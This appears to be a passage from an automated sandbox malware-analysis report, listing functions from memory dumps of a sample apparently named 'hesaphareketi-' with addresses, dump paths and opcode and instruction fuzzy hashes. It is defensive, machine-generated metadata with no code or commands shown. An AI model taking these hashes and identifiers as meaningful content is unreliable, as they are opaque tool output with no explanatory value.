                                            • Instruction ID: 1601bec413c513d33b471e8b1181256ddff104196625d72cc5580ea7395496e0
                                            • Opcode Fuzzy Hash: f5856aaac6d3d51f5617a4371023caf956b4e02a63233e66a6f6dff1df3847d8
                                            • Instruction Fuzzy Hash: CE21CB34700609CFDB54EB78C959BAE77F1EB48750F204468E606EB361DB359D41CBA1
                                            Function 00CF0838 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55c1a6c40854d3d18daac1e604d1749081dd93e91898ed1a250f2bdc839745cd
                                            • Instruction ID: a7472ff39393cc1cc9f5fb8783e905a13c676bb707ee9b4bb0e4d41d9359b34f
                                            • Opcode Fuzzy Hash: 55c1a6c40854d3d18daac1e604d1749081dd93e91898ed1a250f2bdc839745cd
                                            • Instruction Fuzzy Hash: C511E234A003085BEF655BB4D9403793B61EB86B90F314879D552CF2C3DA21CE468BD3
                                            Function 00CF0848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93bf0026d1ae74476a0ef2743149528cb415e6a2856dde2ce4104a6c0adf8574
                                            • Instruction ID: 2f760a9b53042a290b26ec597ca4dc22d9874a6e9007f4f5c79a412831d23d9a
                                            • Opcode Fuzzy Hash: 93bf0026d1ae74476a0ef2743149528cb415e6a2856dde2ce4104a6c0adf8574
                                            • Instruction Fuzzy Hash: 6911C434B0020C8BEFA46B79D9443793752EB85BA5F314839D212CF2C3DA61CE468BD2
                                            Function 00C5D005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99ab6e0c048bdb26a5422364894f661a2a28c7a66b6d15b4835b2ad9b0260261
                                            • Instruction ID: 94caeb92b51dad494717bf13fde8e90195b8e6f69ff6453f51fa547f4cddc8b2
                                            • Opcode Fuzzy Hash: 99ab6e0c048bdb26a5422364894f661a2a28c7a66b6d15b4835b2ad9b0260261
                                            • Instruction Fuzzy Hash: DE2192755093C08FCB12CF24D990715BF71EB86314F28C5EAD8498F2A7C33A984ACB62
                                            Function 00CF1460 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b643e99657bf522cdb77efdebc0f3bc6f82f4101ddb8f68673e996a5709bd2d
                                            • Instruction ID: 0e98e285815b6ddbb52b3139a799376d7bc4ddb352d15cb19afb0d1a6bd7e662
                                            • Opcode Fuzzy Hash: 1b643e99657bf522cdb77efdebc0f3bc6f82f4101ddb8f68673e996a5709bd2d
                                            • Instruction Fuzzy Hash: A4012D31E0121ACBCF65EFB984511BD7BF5AB88360B28047ADA05E7202E635D941CB92
                                            Function 00C5D38F Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: 2eafc5e6f84e3203c374c3e39b29bd00550d04b0fff0d3cc7f3efe5d21efd01d
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 18118B79504280DFCB15CF14D5C4B15BBA2FB84325F24C6A9DC4A4B696C33AE98ACB62
                                            Function 00C5D1DF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                            • Instruction ID: 4dfa928f8a49ab115e5db99e43dcd3923181f06cef60454083f97887d347272a
                                            • Opcode Fuzzy Hash: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                            • Instruction Fuzzy Hash: 9A11B279504380CFDB11CF14D9C4B15FB61FB84324F24C6A9DC494B656C33AD94ACB91
                                            Function 00C4D89D Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3680415052.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c4d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 95793b73af886b8cea67649aed5d62b59c68df8c82919e84ae0d7132d5f87bb8
                                            • Instruction ID: 945f2ad49efede7367b83bea9f3bb2e5b453fa6d77478d688798466ae4f4dd63
                                            • Opcode Fuzzy Hash: 95793b73af886b8cea67649aed5d62b59c68df8c82919e84ae0d7132d5f87bb8
                                            • Instruction Fuzzy Hash: E901F2314083049AE7206A12DC84B76BF98FF51325F28C02AED6A5E2C2C6799C44CAB2
                                            Function 00CF8170 Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80edadb1c32c062b7d682a0801fb307b0fde6a0d8413112422faf4ca3ddf6f60
                                            • Instruction ID: c4bfc9c124a3e5edc40f078672b2ffc309b4c9ff897c7a04d14cf2266daa05ae
                                            • Opcode Fuzzy Hash: 80edadb1c32c062b7d682a0801fb307b0fde6a0d8413112422faf4ca3ddf6f60
                                            • Instruction Fuzzy Hash: 610184349113589FEF15FF75ED8169D7FB1EF81300F1082A9C4089B199DE30AA06DB82
                                            Function 00CF14EC Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 341707da196e56df8d9fde59c8c97e7543c49db99822d0c7e1843f36f42d1928
                                            • Instruction ID: 31e53f4da45af3183d248d491eafaf315d0612ca4007391a31ad6eceeac98302
                                            • Opcode Fuzzy Hash: 341707da196e56df8d9fde59c8c97e7543c49db99822d0c7e1843f36f42d1928
                                            • Instruction Fuzzy Hash: B5F0F636A04158CBDB61CBA584911BCBFB0FAD536172C409BDE45DB212D234D942D713
                                            Function 00C4D89C Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3680415052.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c4d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2bfd64fee4370a8b1011c8bef30e4e60233b35d1c2024ccc4f1cdd665cec22a0
                                            • Instruction ID: 005cda099eb402f467a68c8da307cda2e04cff1073a0a1f7342bc25ceefe3199
                                            • Opcode Fuzzy Hash: 2bfd64fee4370a8b1011c8bef30e4e60233b35d1c2024ccc4f1cdd665cec22a0
                                            • Instruction Fuzzy Hash: 31F0F6714043449EE7149A05DC84B66FFA8FF51334F18C05EED595B282C279AC44CBB1
                                            Function 00CF8180 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a236d43b7d4829df213580fe1742e4d14dba29dbf82a5a083fa9f2807120d17
                                            • Instruction ID: b7e994d0f4c7af2d550e00d018cb89af09002508d95d73858bc238a1e9b51086
                                            • Opcode Fuzzy Hash: 5a236d43b7d4829df213580fe1742e4d14dba29dbf82a5a083fa9f2807120d17
                                            • Instruction Fuzzy Hash: 0EF036349102189FDB05FFA4ED8169D7BB1EF80300F5046A5C0089B199EE307E069791